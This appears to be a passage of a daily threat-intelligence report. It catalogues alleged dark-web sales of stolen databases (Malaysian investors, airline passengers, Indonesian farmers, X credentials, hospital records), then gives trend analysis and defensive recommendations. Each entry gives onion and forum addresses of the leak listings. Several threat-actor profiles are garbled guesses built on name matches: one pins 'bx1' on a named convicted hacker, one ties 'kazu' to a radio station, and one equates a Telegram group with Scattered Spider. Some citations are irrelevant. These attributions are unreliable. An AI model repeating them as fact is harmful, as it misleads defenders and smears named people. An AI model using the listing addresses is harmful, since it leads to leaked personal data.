- Published URL: http://mxxxxxxxs4uqwd6cylditj7rh7zaz2clh7ofgik2z5jpeq5ixn4ziayd.onion/pc/goods_view.php?parameter=715aoqwcyxvw880SzYYwX77wC5GlGS1dNWVwNZVE_244zzfgjbaFE9FwUxUjXfPUJf1j-9puGMBw5x_MikuVQJNEDpMK1ErE1fYPRSDVwqaKmigC8cVthiY4pYuCgvKabkekv4WRJPVDXAbD9wQz59ksTQ98zDrniz9rg_1fj7kgRfhBaTGs-ZpcYNN79OnjdH70a3EjUcLQDuVKQ63Q5IE
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/0dc1b6be-bba0-4453-bb07-dbb37d9f0ed4.png
Incident INC20250624-022: Alleged data leak of Malaysian investors
Incident Details:
The threat actor Market Exchange claims to be selling a database of 130,000 wealthy Malaysian investors. This is a high-value data leak, as information on affluent individuals can be used for sophisticated financial scams, phishing, and other targeted attacks.
Threat Actor Profile: Market Exchange
As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.
Associated Resources:
- Published URL: http://mxxxxxxxs4uqwd6cylditj7rh7zaz2clh7ofgik2z5jpeq5ixn4ziayd.onion/pc/goods_view.php?parameter=37d3rZ0YCOHwTd7eJ5yW2UH3AcOOjGNm2w3yPrthZHnCZPK56gNS1GboMdG3ttjWkxZg1OVlD6zS1E8Y2IIqwZWcQLysvu9ZMwehtCGi08NZQtZ9sY2cjO4Mi2pldmK5PsWBUscrJ8PA12guOjCYmt1yFS_wmS7ABe9uKutIiiSYqTN2O_lv3ZAUuroNir2Wdz3Jp0_6g3dzzYslsAXtuEM
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/0f123277-4d1d-454f-9b1a-e572030f1af1.png
Incident INC20250624-023: Alleged data leak Malaysian individuals
Incident Details:
The threat actor Market Exchange claims to be selling a database of 200,000 Malaysian individuals associated with health products, including their ID card information. This is another significant data leak, providing personal identifiers that can be exploited for various illicit activities.
Threat Actor Profile: Market Exchange
As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.
Associated Resources:
- Published URL: http://mxxxxxxxs4uqwd6cylditj7rh7zaz2clh7ofgik2z5jpeq5ixn4ziayd.onion/pc/goods_view.php?parameter=bb5aWef1iFos-rnQYYhHlWOx4SErv0EEihZIQsSjRirF3fvSGq71e8kETYuXA1_cvD6mPbTNZ7OC4z3KHF-lITGFI7zV5ryMagd0ClSzjyFH-5Xc7uOh3uaZprzpAl2pf5lgT46dGpcDWpz5STDYWsWAc6oAdOE0SC3v8e0uoPDjS-FmSSwTIX-IPf3SuAvIjwy9CKJfAs3Hud5Yw8cLsR4
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/f1bc8cf8-12c1-4ddb-a7a7-40e472559998.png
Incident INC20250624-024: Alleged data breach of CETDIGIT
Incident Details:
The threat actor morse claims to be selling a 19.2 million record B2B database reportedly stolen from cetdigit.com, a Salesforce Crest and HubSpot Elite Partner. The data includes full names, verified business emails, job titles, company names, full addresses, and phone numbers, with global coverage but a focus on North America and Europe. The breach affects various industries such as finance, healthcare, manufacturing, and retail. This is a significant B2B data breach with wide-ranging implications.
Threat Actor Profile: morse
Specific threat intelligence on a malicious actor or group named “morse” is not available in the provided research.50 The term “morse” is not mentioned in Microsoft’s threat actor naming taxonomy.50 This suggests “morse” might be an individual or an ephemeral alias rather than a well-documented threat group.
Associated Resources:
- Published URL: https://darkforums.st/Thread-cetdigit-com-B2B-Database-19M-Unique-Records-Full-Name-Job-Address-Email-etc
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/969b01e9-cf0e-4174-a4f9-b919b0bac792.png
- https://d34iuop8pidsy8.cloudfront.net/e1a7258b-8aa7-4394-94cf-df5dc2c37146.png
- https://d34iuop8pidsy8.cloudfront.net/7b6e1b7e-f96c-4273-aa91-760d7cf9b730.png
Incident INC20250624-025: Alleged data breach of X
Incident Details:
A threat actor named bx1 claims to have breached data from X (formerly Twitter). The compromised dataset reportedly contains over 200 million email and password combinations. This is a massive data breach of a major social media platform, with significant implications for user security.
Threat Actor Profile: bx1
“bx1” is the alias of Hamza Bendelladj, an Algerian cyberhacker and carder born in 1988, also known as the “Smiling Hacker”.51 He was on Interpol’s and the FBI’s top 10 most wanted hackers list for allegedly embezzling tens of millions of dollars from over 200 American and European financial institutions.51 Bendelladj, using pseudonyms like “BX1” or “Daniel HB,” developed and operated the “SpyEye Botnet” with a Russian accomplice named Aleksandr Andreevich Panin (aka “Gribodemon”).51 This malicious software infected over 60 million computers worldwide, primarily to harvest credit card numbers, online bank logins, and PINs, leading to estimated losses of approximately one billion dollars between 2010 and 2012.51 Bendelladj was arrested in Thailand in 2013 and extradited to the United States, where he pleaded guilty and was sentenced to 15 years in prison.51 His release from prison has sparked debate regarding his symbolic status as a resistance figure against banking systems.51
Associated Resources:
- Published URL: https://kittyforums.to/thread/145
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/92f585e5-5d13-4067-b714-358dbb085af8.png
Incident INC20250624-026: Alleged data breach of Hospital Civil de Guadalajara
Incident Details:
The threat actor kazu claims to be selling data from a major breach of the Mexican government’s Hospital Civil de Guadalajara (hcg.gob.mx), a prominent public healthcare institution in Jalisco. The breach includes 33,358 files totaling 7.6 GB of data, allegedly containing sensitive hospital-related records. This is a critical breach impacting patient data and healthcare operations.
Threat Actor Profile: kazu
The name “kazu” in the context of a threat actor is not associated with a specific, well-documented cybercrime group in the provided research.54 “Kazu” appears to be a common name, and in some contexts, it refers to individuals in the cybersecurity industry or general discussions about cybercrime.55 For instance, Dina Temple-Raston, a journalist, has hosted discussions with “real-life hackers” on a platform called KAZU.55 The term also appears in discussions about ransomware as a business model and the vulnerabilities of critical infrastructure.56 Therefore, “kazu” is likely an individual actor or a temporary alias rather than an established threat group.
Associated Resources:
- Published URL: https://darkforums.st/Thread-Selling-Mexican-Gov-Breach-%E2%80%93-33K-files-Records-hcg-gob-mx
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/3e6fe584-fd7e-4b2c-8707-9bb709eee9d4.png
Incident INC20250624-027: Alleged data leak of Ministry of Agriculture of the Republic of Indonesia
Incident Details:
The threat actor KEDIRISECTEAM claims to be selling a database containing detailed personal and business information of 8,438 millennial and “andalan” (reliable) farmers in Indonesia. The leaked data includes full names, gender, national ID numbers (NIK), addresses, birth details, phone numbers, emails, and links to ID card and passport photos. It also contains sensitive business-related information such as agricultural subsectors, commodities produced, business income ranges and averages, and involvement in government-supported loan programs like KUR (Kredit Usaha Rakyat). This is a highly sensitive data breach impacting a critical sector and personal livelihoods.
Threat Actor Profile: KEDIRISECTEAM
Specific threat intelligence on a malicious actor or group named “KEDIRISECTEAM” is not extensively detailed in the provided research.12 The name appears in contexts related to general cybercrime discussions, including mentions of ransomware operations and illegal APKs.59 While the provided research does not offer a comprehensive profile, the group’s alleged activities align with financially motivated data theft.
Associated Resources:
- Published URL: https://darkforums.st/Thread-Document-8K-DATABASE-PETANI-MILENIAL-DAN-ANDALAN
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/8ea3fbfb-0fa8-45a0-bf7b-e860479d4c34.png
Incident INC20250624-028: Alleged data breach of Direktorat Jenderal Kependudukan dan Pencatatan Sipil
Incident Details:
The threat actor HIME666 claims to have breached the data of Dukcapil Indonesia (Direktorat Jenderal Kependudukan dan Pencatatan Sipil). The compromised data includes name, address, age, date of birth, etc. This is a significant breach of national citizen data, with broad implications for identity security.
Threat Actor Profile: HIME666
Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://kittyforums.to/thread/167
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/fccb3fd3-9d8d-424f-bec9-3f31f263f8b4.png
Incident INC20250624-029: Alleged data leak of Malaysia visa Data
Incident Details:
The threat actor HIME666 claims to have leaked Malaysia visa data. This type of data leak can have implications for national security and individual privacy.
Threat Actor Profile: HIME666
Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://kittyforums.to/thread/166
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/bff20346-beca-451e-a9f2-4d6c13fdd17f.png
Incident INC20250624-030: Alleged data leak of Malaysia Airlines customers
Incident Details:
The threat actor Market Exchange claims to be selling a leaked dataset containing 210,000 Malaysia Airlines First Class customers, including passport details. This is a significant data breach impacting the aviation industry and high-value individuals.
Threat Actor Profile: Market Exchange
As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.
Associated Resources:
- Published URL: http://mxxxxxxxsjznlccmh5p64nambxuoklg44kmjscl2nkvgoolnzeiqbmqd.onion/pc/goods_view.php?parameter=3afbHxlu-kSNSJZEMvf22wQK4UQHixhmK602T2DG88bpvmhpvZYYQPfcIUThLFq-Yhas1ycUKhowhg67vr1Vt-__lP8HUlEBgvKNVmN0R_yPZ254c-5JuGiPWffWykVymAUTaiOh8yjUFkbHvVJhoheUUVSnEo1H9-Q5SgNpzMCg5fd7p5ATYJZCRFZrdpn3PBslpr_yazWQzT6nEJarDM
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/0879d0ec-38e9-44f6-afbf-0ce706915ba0.png
Incident INC20250624-031: Alleged data leak of credit card details and bank data
Incident Details:
The group Octo Dark Cyber Squad(Official) claims to have publicly leaked a dataset containing 1,500 credit card and bank records from individuals in the UK and USA. This is a direct financial data leak, posing immediate risks of fraud to the affected individuals.
Threat Actor Profile: Octo Dark Cyber Squad(Official) (Scattered Spider/Octo Tempest)
“Octo Dark Cyber Squad(Official)” is an alias for “Octo Tempest,” which overlaps with research associated with “Scattered Spider” (also known as UNC3944, 0ktapus, Muddled Libra, and Scatter Swine).61 Scattered Spider is a financially motivated, highly adaptive, English-speaking threat actor collective active since at least 2022.64 They have evolved from large-scale phishing operations to sophisticated hybrid intrusions, combining social engineering, identity system abuse, cloud exploitation, and ransomware deployment.64
Key features of Scattered Spider include specializing in social engineering tactics such as SMS phishing, SIM swapping, and MFA fatigue, often abusing identity and access management systems for persistent access.64 They initially focused on telecom and BPO but later pivoted to hospitality, retail, tech, finance, and media.64 They have collaborated with ransomware groups like ALPHV/BlackCat and Qilin for double extortion.64 Octo Tempest is described as a highly bespoke and hands-on threat actor, often engaged in “keyboard-to-keyboard combat” and showing extreme persistence even after being detected.61 They prefer to use existing tools and functionalities within a compromised system (“living off the land”) rather than deploying traditional malware, making their activities harder to detect.61
Associated Resources:
- Published URL: https://t.me/c/2214335809/399
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/cf81a65a-78bc-4e41-b9b8-1bc7d08ee59e.png
Incident INC20250624-032: Alleged data breach of CGI India
Incident Details:
The threat actor HIME666 claims to have breached the data of CGI India. The compromised data consists of name, email, city, phone, etc. This is a data breach impacting an IT services company, which can have broader implications if client data is also affected.
Threat Actor Profile: HIME666
Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://kittyforums.to/thread/168
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/1423ff5f-1422-4b7d-936f-726985499ad3.png
Incident INC20250624-033: Alleged leak of Fbi Leaders data
Incident Details:
A threat actor named uralxploitvhem claims to have leaked a database allegedly belonging to the Federal Bureau of Investigation (FBI). The compromised data reportedly includes personal information of FBI leadership, such as addresses and other sensitive details. This is a highly sensitive national security incident, potentially involving state-sponsored espionage or a significant hacktivist operation.
Threat Actor Profile: uralxploitvhem
Specific threat intelligence on a malicious actor or group named “uralxploitvhem” is not available in the provided research.65 This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://kittyforums.to/thread/113
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/4c4d53dc-3e36-406c-9cbc-78da5afea3e3.png
Incident INC20250624-034: Alleged data breach of LuxService
Incident Details:
The threat actor RXY claims to have leaked a dataset from the admin panel of LuxService in Luxembourg (LU). The exposed database includes personal information of users such as full names, email addresses, phone numbers, and home addresses. The post lists over 25 individuals, with details pointing to residents of Luxembourg, and some entries from Kampala and other locations. This is a data breach impacting an IT services company and its users.
Threat Actor Profile: RXY
The term “RXY” in the context of a threat actor is not associated with a specific, well-documented cybercrime group in the provided research.50 In some contexts, “XRY” refers to mobile forensics and data recovery software.66 In others, it appears in general discussions about cybercrime or threat actor identification without defining “RXY” as a specific malicious entity.50 Therefore, “RXY” is likely an individual actor or a temporary alias rather than an established threat group.
Associated Resources:
- Published URL: https://darkforums.st/Thread-Source-Code-RE-DATE-LEAK-ADMIN-LUX-SERVICE-LU
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/d47aeec7-e12a-4950-8a90-2e4ff6bcd428.png
Incident INC20250624-035: Alleged leak of ALMOASHER BUSINESS (ERP & CRM)
Incident Details:
A threat actor named HIME666 claims to have leaked a complete 46 GB dataset from Al Moasher Business, a company that specializes in developing administrative software solutions, including Enterprise Resource Planning (ERP) systems, Customer Relationship Management (CRM) programs, web applications, websites, and business consulting services. This is a significant data breach impacting a software and consulting firm, with potential implications for its clients.
Threat Actor Profile: HIME666
Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.
Associated Resources:
- Published URL: https://kittyforums.to/thread/161
- Screenshots:
- https://d34iuop8pidsy8.cloudfront.net/75253e8f-978b-472f-ae13-495da7d97535.png
IV. Emerging Threat Landscape Trends
The incidents observed over the past 24 hours, combined with broader threat intelligence, reveal several critical trends shaping the current cybersecurity landscape.
The cybercrime ecosystem continues to evolve into a highly professionalized and industrialized domain. Ransomware gangs, for instance, function like illicit businesses, complete with hierarchical structures, affiliate programs, and even “customer support” for victims.45 This includes specialized roles such as coders, negotiators, access brokers, and money launderers, indicating a mature and organized criminal industry.45 The presence of established forums and communities dedicated to various cybercrime subcategories further solidifies this structure.7
Ransomware remains a dominant threat, but its methods are undergoing significant evolution. The emergence of new ransomware groups is a constant feature of the threat landscape. A particularly notable development is the strategic shift towards pure data extortion models, as exemplified by World Leaks.33 In this model, threat actors forgo data encryption, focusing solely on exfiltrating sensitive information and threatening its public disclosure if a ransom is not paid.33 This adaptation means that traditional recovery strategies, such as relying on robust backups, are no longer sufficient to mitigate the full impact of an attack, as the reputational and regulatory consequences of data exposure persist.
The professionalization of cyber extortion is further evidenced by the adoption of sophisticated business models by cybercrime organizations. These entities operate distinct platforms for data leaks, victim negotiations, and affiliate management, mirroring legitimate SaaS operations.33 This structured approach, complete with strategic branding and psychological tactics to coerce victims, indicates a calculated effort to maximize illicit profits.33 Some criminal groups even engage in “criminal branding,” strategically avoiding attacks on sensitive targets like hospitals or schools to manage public perception and potentially reduce law enforcement scrutiny.45
A critical component of this sophisticated ecosystem is the role of Initial Access Brokers (IABs). These specialized actors focus on gaining initial access to networks and then selling these access credentials to other threat groups, including ransomware operators.44 This division of labor creates a complex supply chain of illicit services, where a single initial compromise can be monetized multiple times by different actors, leading to cascading attacks. This interconnectedness means that an organization’s initial breach might not be the ultimate objective of the initial attacker but rather a stepping stone for a subsequent, more damaging attack by another group.
The increasing intersection of hacktivism, cybercrime, and cryptocurrency is also a prominent trend. Groups like Dark Storm demonstrate dual motivations—political and financial—by offering DDoS-for-hire services and even launching their own cryptocurrency coins.1 This signifies that hacktivists are not solely driven by ideology but are also seeking financial sustainability and new ways to monetize their activities, making them more resilient and persistent. The use of cryptocurrencies for funding and monetization creates new challenges for tracking and disrupting illicit financial flows.
The scale of cybercrime infrastructure is exemplified by massive botnet operations. The case of Yunhe Wang and the “911 S5” botnet, which comprised millions of compromised devices globally, demonstrates how such large-scale infrastructure is rented out to facilitate a wide range of cybercrimes, from identity theft to financial fraud.29 The billions in estimated losses attributed to this single operation underscore the foundational role of such infrastructure in enabling widespread criminal activity.
DDoS attacks have become a weaponized tool for political disruption, propaganda, and even as a revenue stream. Hacktivist groups strategically employ DDoS attacks for political, social, and religious motivations, often in coordinated campaigns and as part of “DDoS-as-a-service” offerings.36 This elevates DDoS from a mere technical nuisance to a significant component of hybrid warfare, capable of disrupting critical services and eroding public trust.
Finally, a concerning development is the escalation of some sophisticated cybercriminal groups towards zero-day exploitation and maintaining long-term persistence within compromised networks.15 XE Group’s evolution to using zero-day vulnerabilities and maintaining access for years blurs the lines between advanced cybercrime and nation-state APTs.15 This indicates a significant investment in advanced capabilities by some financially motivated groups, challenging the assumption that only nation-states engage in such sophisticated, persistent campaigns. Despite this, even highly sophisticated APTs, such as APT29, continue to rely on a combination of social engineering and exploiting known, unpatched vulnerabilities for initial access and persistence, rather than exclusively using zero-days.68 This highlights that even the most advanced adversaries will often exploit the easiest path, which frequently involves unpatched systems or human weaknesses.
V. Conclusions and Recommendations
The current cyber threat landscape is characterized by its fluidity, professionalization, and a dangerous convergence of motivations and capabilities among threat actors. The traditional distinctions between cybercriminals and hacktivists are diminishing, with many groups adopting hybrid models that combine ideological goals with financial gain. This evolution, coupled with the increasing sophistication of financially motivated actors and the weaponization of tactics like DDoS and data extortion, presents a complex challenge for organizations worldwide. The reliance on supply chain compromises and the strategic use of zero-day exploits by some groups further amplify the risk, demonstrating a shift towards more targeted and persistent campaigns.
To effectively counter these evolving threats, organizations must adopt a proactive and intelligence-led security posture. The following recommendations are critical:
Enhanced Threat Intelligence and Profiling
Organizations must invest in tailored threat intelligence capabilities to understand specific adversaries, their motivations, and their Tactics, Techniques, and Procedures (TTPs).12 This involves moving beyond generic security practices to develop a personalized threat landscape that focuses on the threats most relevant to the organization’s specific security goals, business vertical, and critical assets.12 Continuously updating these profiles allows for anticipatory defense and more effective allocation of security investments.12
Robust Vulnerability Management and Patching
Despite the rise of zero-day exploitation, many sophisticated attacks, even by APTs, still leverage known and unpatched vulnerabilities.68 Implementing a rigorous and timely vulnerability management program, including regular patching and configuration hardening, is fundamental. Prioritizing patches for vulnerabilities known to be exploited in the wild can significantly reduce the attack surface against a wide range of adversaries.68
Comprehensive Security Awareness Training
Given that human vulnerabilities remain a primary attack vector, particularly through social engineering tactics like phishing, SMishing, vishing, and SIM swapping 37, continuous and adaptive security awareness training is paramount. Training should educate employees on identifying sophisticated social engineering attempts and reporting suspicious activities, thereby strengthening the human firewall.37 This also extends to mitigating insider threats, whether malicious or unintentional.37
Strengthening Supply Chain Security
The increasing targeting of third-party vendors and development environments for intellectual property theft and broader supply chain compromises necessitates robust due diligence and security controls for all external partners.46 Organizations should implement strict access controls, conduct regular security audits of their supply chain, and monitor for any suspicious activity originating from trusted third-party connections. Securing development pipelines, including GitHub repositories and source code, is crucial to prevent cascading vulnerabilities.46
Advanced Detection and Response Capabilities
To counter the “living off the land” techniques and the long-term persistence tactics employed by sophisticated threat actors, organizations need advanced endpoint detection and response (EDR) and network monitoring capabilities.15 These tools enable the detection of abnormal use of legitimate system tools and scripts, which often bypass traditional signature-based security solutions. Effective threat hunting, forensic analysis, and rapid incident response capabilities are essential to minimize the impact of breaches.47
Geopolitical Awareness in Cyber Defense
The growing influence of geopolitical events on cyberattacks, particularly through state-sponsored hacktivism and information operations, requires security teams to integrate geopolitical intelligence into their threat models.1 Understanding the political motivations and affiliations of threat groups can help anticipate potential targets and attack campaigns, especially for organizations operating in sensitive sectors or regions.
By adopting these comprehensive strategies, organizations can enhance their resilience against the complex and ever-evolving cyber threat landscape, moving towards a more proactive and intelligence-driven defense posture.
Works cited
- Global Hacktivist Threats – Graphika, accessed June 24, 2025, https://graphika.com/reports/global-hacktivist-threats
- Weekly Intelligence Report – 06 June 2025 – cyfirma, accessed June 24, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-06-june-2025/
- Tangible Risks, Intangible Opportunities: Long-term Risk Preparedness and Responses for Threats to Cultural Heritage – ICOMOS Open Archive, accessed June 24, 2025, http://openarchive.icomos.org/1509/1/ICOMOS_2012_Proceedings_final.pdf
- Identifying a Threat Actor Profile, accessed June 24, 2025, https://oasis-open.github.io/cti-documentation/examples/identifying-a-threat-actor-profile.html
- Cyber Investigations – Secret Service, accessed June 24, 2025, https://www.secretservice.gov/investigations/cyber
- Cybersecurity – Homeland Security, accessed June 24, 2025, https://www.dhs.gov/topics/cybersecurity
- Threat actor | Flashpoint, accessed June 24, 2025, https://flashpoint.io/intelligence-101/threat-actor/
- Cyber Threat Profile | Google Cloud, accessed June 24, 2025, https://cloud.google.com/security/resources/datasheets/cyber-threat-profile
- Threat Actor Profiles – Page 5 of 7 – SOCRadar® Cyber Intelligence Inc., accessed June 24, 2025, https://socradar.io/category/threat-actor-profiles/page/5/
- Handala’s Wiper: Threat Analysis and Detections | Splunk, accessed June 24, 2025, https://www.splunk.com/en_us/blog/security/handalas-wiper-threat-analysis-and-detections.html
- ASPJOC – INTERPOL Asia and South Pacific Joint Operations on Cybercrime, accessed June 24, 2025, https://www.interpol.int/Crimes/Cybercrime/Projects/ASPJOC-INTERPOL-Asia-and-South-Pacific-Joint-Operations-on-Cybercrime
- Threat Profiles – Google Threat Intelligence – VirusTotal, accessed June 24, 2025, https://gtidocs.virustotal.com/docs/threat-profiles-guides
- Threat Actor profile: SideCopy – Cyble, accessed June 24, 2025, https://cyble.com/threat-actor-profiles/sidecopy/
- Reflections of the Israel-Iran Conflict on the Cyber World …, accessed June 24, 2025, https://socradar.io/reflections-of-israel-iran-conflict-cyber-world/
- From credit card fraud to zero-day exploits: Xe Group expanding cybercriminal efforts, accessed June 24, 2025, https://cyberscoop.com/xegroup-zero-day-exploit-intezer-labs-solis-security-vietnam/
- Adobe Investigating Reader X 0-day Security Hole on Sale for $50,000 – TNW, accessed June 24, 2025, https://thenextweb.com/news/adobe-investigating-reader-x-0-day-security-hole-allegedly-selling-on-the-black-market-for-50000
- OS X zero day bug allows hackers to bypass system integrity protection – HelpNet Security, accessed June 24, 2025, https://www.helpnetsecurity.com/2016/03/24/os-x-zero-day-bug-allows-hackers-bypass-system-integrity-protection/
- Hacktivist Group Claims Cyberattack That Spurred Multiple X Outages on Monday, accessed June 24, 2025, https://www.bitdefender.com/en-gb/blog/hotforsecurity/hacktivist-group-claims-cyberattack-that-spurred-multiple-x-outages-on-monday
- Naseer Babangida Muazu http://etd.uwc.ac.za/ – CORE, accessed June 24, 2025, https://core.ac.uk/download/344926090.pdf
- i Editorial Climate change is upon us all and its impact is not gender, accessed June 24, 2025, https://njssh.nust.edu.pk/index.php/njssh/issue/download/24/9
- (PDF) Cyber Security Threats to Malaysia: A Small State Security Discourse – ResearchGate, accessed June 24, 2025, https://www.researchgate.net/publication/349881373_Cyber_Security_Threats_to_Malaysia_A_Small_State_Security_Discourse
- Hacktivism – Wikipedia, accessed June 24, 2025, https://en.wikipedia.org/wiki/Hacktivism
- Cyber Security and Fraud Control Prevention and Detection – iProject Download, accessed June 24, 2025, https://www.iprojectdownload.com/cyber-security-and-fraud-control-prevention-and-detection/
- Cybersecurity Threats Among Information Managers in Cloud-Based Information Systems in Kano State Electricity Distribution Company, accessed June 24, 2025, https://journal.ijprse.com/index.php/ijprse/article/download/1108/1070/1829
- Four Members of Notorious Cybercrime Group ‘FIN9’ Charged for Roles in Attacking U.S. Companies – Department of Justice, accessed June 24, 2025, https://www.justice.gov/usao-nj/pr/four-members-notorious-cybercrime-group-fin9-charged-roles-attacking-us-companies
- 4 FIN9-linked Vietnamese Hackers Indicted in $71M U.S. Cybercrime Spree, accessed June 24, 2025, https://thehackernews.com/2024/06/4-fin9-linked-vietnamese-hackers.html
- Profiles of Cyber-Attackers and Attacks | 1 | Cyber-Security Threats, – Taylor & Francis eBooks, accessed June 24, 2025, https://www.taylorfrancis.com/chapters/edit/10.1201/9781003006145-1/profiles-cyber-attackers-attacks-dimitrios-kavallieros-georgios-germanos-nicholas-kolokotronis
- CVE-2025-22462 – Exploits & Severity – Feedly, accessed June 24, 2025, https://feedly.com/cve/CVE-2025-22462
- Authorities arrest man allegedly running ‘likely world’s largest ever’ cybercrime botnet – Newsday, accessed June 24, 2025, https://www.newsday.com/business/botnet-cybercrime-pandemic-fraud-malware-identity-theft-online-fraud-m71889
- Threat Actor Profile – GhostSec – Outpost24, accessed June 24, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
- Ghost Security – Wikipedia, accessed June 24, 2025, https://en.wikipedia.org/wiki/Ghost_Security
- Threat Actor Profiles – Malware Patrol, accessed June 24, 2025, https://www.malwarepatrol.net/threat-actor-profiles/
- World Leaks: An Extortion Platform – Lexfo’s security blog, accessed June 24, 2025, https://blog.lexfo.fr/world-leaks-an-extortion-platform.html
- UBS confirms employee data leak after ransomware attack on …, accessed June 24, 2025, https://siliconangle.com/2025/06/18/ubs-confirms-employee-data-leak-ransomware-attack-supplier/
- Rare Werewolf APT Uses Legitimate Software in Attacks on Hundreds of Russian Enterprises – The Hacker News, accessed June 24, 2025, https://thehackernews.com/2025/06/rare-werewolf-apt-uses-legitimate.html
- Escalating Hacktivist Attacks Amidst India-Pakistan Tensions – Radware, accessed June 24, 2025, https://www.radware.com/security/threat-advisories-and-attack-reports/escalating-hacktivist-attacks-amidst-india-pakistan-tensions/
- Threat Actor – Arctic Wolf, accessed June 24, 2025, https://arcticwolf.com/resources/glossary-uk/what-is-a-threat-actor/
- Insights from the front: Cyber security arms race picks up | ITWeb, accessed June 24, 2025, https://www.itweb.co.za/article/insights-from-the-front-cyber-security-arms-race-picks-up/GxwQDM1DkON7lPVo
- U.S. Army Cyber Command: Operate, Defend, Attack, Influence, Inform, accessed June 24, 2025, https://www.arcyber.army.mil/
- Iran-Linked Threat Actors Leak Visitors and Athletes … – Resecurity, accessed June 24, 2025, https://www.resecurity.com/blog/article/iran-linked-threat-actors-leak-visitors-and-athletes-data-from-saudi-games
- Cyber Fattah Leaks Data from Saudi Games in Alleged Iranian …, accessed June 24, 2025, https://www.infosecurity-magazine.com/news/cyber-fattah-leaks-data-saudi-games/
- Cyber, Crypto Assets and Emerging Technology – SEC.gov, accessed June 24, 2025, https://www.sec.gov/about/divisions-offices/division-enforcement/cyber-crypto-assets-emerging-technology
- APWG’s Crypto Currency Efforts, accessed June 24, 2025, https://apwg.org/crypto-currency-apwg/
- The Top Threat Actor Groups Targeting the Financial Sector …, accessed June 24, 2025, https://flashpoint.io/blog/top-threat-actor-groups-targeting-financial-sector/
- Inside the Ransomware Marketplace: How Threat Actors Operate …, accessed June 24, 2025, https://cybersteward.com/inside-the-ransomware-marketplace-how-threat-actors-operate/
- Deloitte Data Breach: Threat Actor “303” – Varindia, accessed June 24, 2025, https://www.varindia.com/public/news/deloitte-data-breach-threat-actor-303
- Ultimate Guide to Building a SOC and SIEM Career in 2025 – Rokibul’s Website, accessed June 24, 2025, https://rokibulroni.com/blog/ultimate-guide-to-soc-siem-career-2025/
- Radware reports hybrid warfare as cyberattacks, disinformation …, accessed June 24, 2025, https://industrialcyber.co/threats-attacks/radware-reports-hybrid-warfare-as-cyberattacks-disinformation-escalate-in-2025-israel-iran-conflict/
- Dark Storm Is Coming – Are You Safe Enough to Handle It? – Safe …, accessed June 24, 2025, https://safe.security/resources/blog/dark-storm-is-coming-are-you-safe-enough-to-handle-it/
- How Microsoft names threat actors – Unified security operations …, accessed June 24, 2025, https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming
- Hamza Bendelladj – Wikipedia, accessed June 24, 2025, https://en.wikipedia.org/wiki/Hamza_Bendelladj
- What Is Spyware? Definition, Types and How to Prevent It – NordLayer, accessed June 24, 2025, https://nordlayer.com/learn/threats/spyware/
- International Cybercriminal Extradited from Thailand to the United States, accessed June 24, 2025, https://www.justice.gov/archives/opa/pr/international-cybercriminal-extradited-thailand-united-states
- 2022 Global Threat Intelligence Report – NTT Data, accessed June 24, 2025, https://us.nttdata.com/en/-/media/nttdataamerica/files/gated-asset/2022-global-threat-intelligence-report.pdf
- Dina Temple-Raston | 90.3 KAZU, accessed June 24, 2025, https://www.kazu.org/people/dina-temple-raston
- Colonial Pipeline Shutdown Is The Latest In Wave Of Cyber Attacks | 90.3 KAZU, accessed June 24, 2025, https://www.kazu.org/npr-news/2021-05-12/colonial-pipeline-shutdown-is-the-latest-in-wave-of-cyber-attacks
- Decomposing a Threat | Red Team Development and Operations – RedTeam.Guide, accessed June 24, 2025, https://redteam.guide/docs/Exercises/threat-profile/
- Justice Department charges 2 Russians with operating cybercrime group using ransomware, accessed June 24, 2025, https://www.cbsnews.com/news/justice-department-charges-russian-men-cybercrime-ransomware/
- Norton Secure VPN (1 year, 1 device) | HACKED BY KEDIRISECTEAM, accessed June 24, 2025, https://umuriakudus.onthehub.com/WebStore/OfferingDetails.aspx?o=3c5b4909-cb9c-e811-8109-000d3af41938
- Keamanan Cyber di Dark Web: Motif, Tipu Daya, dan Layanan Ilegal | TikTok, accessed June 24, 2025, https://www.tiktok.com/@tekdotid/video/7390973426875239686
